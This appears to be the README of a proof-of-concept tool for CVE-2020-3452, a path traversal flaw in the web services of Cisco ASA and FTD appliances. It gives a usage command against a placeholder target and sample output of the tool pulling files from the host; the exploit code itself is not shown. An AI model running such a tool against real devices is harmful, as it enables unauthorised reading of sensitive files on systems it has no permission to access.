
CVE-2020-3452 - Cisco Adaptive Security Appliance (ASA) Software وCisco Firepower Threat Defense (FTD) traversal
الاستخدام: CVE-2020-3452.py https://target
وصف الثغرة: توجد ثغرة في واجهة خدمات الويب لبرنامج Cisco Adaptive Security Appliance (ASA) وبرنامج Cisco Firepower Threat Defense (FTD) يمكن أن تسمح لمهاجم غير مصادق عن بُعد بتنفيذ هجمات اجتياز المسار وقراءة ملفات حساسة على النظام المستهدف.
مثال على المخرجات:
➜ Cisco-ASA-FTD-Web-Services-Traversal git:(main) ✗ python CVE-2020-3452.py https://target
+-------------------------------------------------------------+
- [ Cisco ASA / FTD Web Services Traversal Vulnerability ]
- -[ CVE-2020-3452 - PoC by: LiquidSky ^_^ ]-
+-------------------------------------------------------------+
[*] Checking potential target : https://target
[+] https://target is vulnerable...
[+] Grabbing logo.gif from the host.
[+] https://target is vulnerable...
[+] Grabbing http_auth.html from the host.
[+] https://target is vulnerable...